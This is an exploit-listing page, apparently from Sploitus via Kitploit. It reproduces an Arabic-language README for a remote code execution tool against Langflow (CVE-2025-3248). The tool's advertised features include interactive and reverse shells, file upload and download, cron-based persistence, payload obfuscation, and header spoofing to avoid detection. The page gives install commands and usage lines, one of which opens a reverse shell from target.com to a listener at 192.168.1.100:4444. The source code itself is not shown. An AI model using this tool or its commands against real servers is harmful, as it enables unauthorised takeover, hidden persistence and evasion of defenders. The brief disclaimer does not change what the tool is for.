Sploitus

langflow-rce-exploit

kitploit · 2026-08-25

Exploit Code

MARKDOWN161 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0-D3Y-LANGFLOW-RCE-EXPLOIT
# استغلال تنفيذ الأوامر عن بعد في Langflow (CVE-2025-3248)

![Python Version](https://img.shields.io/badge/python-3.6+-blue) ![License](https://img.shields.io/badge/license-MIT-green) ![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20Windows-lightgrey)

أداة استغلال تنفيذ الأوامر عن بعد في Langflow (CVE-2025-3248)

## الميزات

  * الكشف التلقائي عن الثغرات
  * أوضاع استغلال متعددة: 
    * شل تفاعلية
    * تنفيذ أمر واحد
    * اتصال شل عكسية
  * إمكانية رفع الملفات
  * واجهة مستخدم ملونة
  * طرق متعددة للشل العكسية
  * حفظ سجل الأوامر



## 📌 سجل التغييرات (v2.0)

### ✨ ميزات جديدة:

  * **نظام الحمولات المتقدم** مع 5 طرق تنفيذ
  * **رفع/تنزيل الملفات** بتشفير Base64
  * **الثبات** عبر مهام cron (أمر `persist`)
  * **ترقية الشل التفاعلية** : 
    * `upload local_path remote_path`
    * `download remote_path local_path`
    * أمر `clear` للطرفية



### 🛡️ تحسينات أمنية:

  * **إخفاء الحمولة تلقائيًا** (Base64 + متغيرات عشوائية)
  * **تدوير الترويسة** لكل طلب: 
    * وكيل مستخدم `User-Agent` عشوائي
    * عناوين IP مزيفة `X-Forwarded-For`
  * **تجاوز HTTPS** (دعم الشهادات الموقعة ذاتيًا)
  * **لا إعادة توجيه** لتجنب الكشف



### ⚡ تحسينات تقنية:

  * **التحقق متعدد المراحل من الثغرة**
  * **تحسين معالجة الأخطاء** للاتصالات غير المستقرة
  * **تسجيل الجلسة بالكامل** إلى `exploit_log.txt`
  * **حفظ سجل الأوامر** (`.langflow_shell_history`)



### 📊 مقارنة الإصدارات:

### 🐛 إصلاحات الأخطاء:

  * إصلاح مشكلات اتصال HTTPS
  * تحسين معالجة الأحرف الخاصة في الأوامر
  * استقرار موثوقية الشل العكسية



## المتطلبات

  * Python 3.6 أو أحدث
  * المكتبات المطلوبة: 
    * `requests`
    * `colorama`
    * `readline`



## التثبيت

root@kitploit:~
    
    
    git clone https://github.com/0-d3y/langflow-rce-exploit.git
    cd langflow-rce-exploit
    pip install -r requirements.txt
    

## الاستخدام

root@kitploit:~
    
    
    python exploit.py <URL> [options]
    

### الخيارات المتاحة:

### أمثلة:

  1. التحقق من الثغرة:



root@kitploit:~
    
    
    python exploit.py http://target.com
    

  2. بدء شل تفاعلية:



root@kitploit:~
    
    
    python exploit.py http://target.com --shell
    

  3. تنفيذ أمر واحد:



root@kitploit:~
    
    
    python exploit.py http://target.com --command "whoami"
    

  4. إطلاق شل عكسية:



root@kitploit:~
    
    
    python exploit.py http://target.com --reverse 192.168.1.100 4444
    

## لقطات الشاشة

Image.png)

## تحذير

⚠️ هذه الأداة مخصصة لأغراض **التعليم والاختبار المصرح به فقط**.  
⚠️ الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها يعد غير قانوني.

## الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

## المؤلف

  * **Mr.SaMi**  
![Twitter](https://img.shields.io/badge/Twitter-@Linux_ye-blue)  
![Instagram](https://img.shields.io/badge/Instagram-@s4tech.ye-purple)



## المساهمة

نرحب بطلبات السحب. للتغييرات الكبيرة، يرجى فتح مشكلة أولاً لمناقشة ما ترغب في تغييره.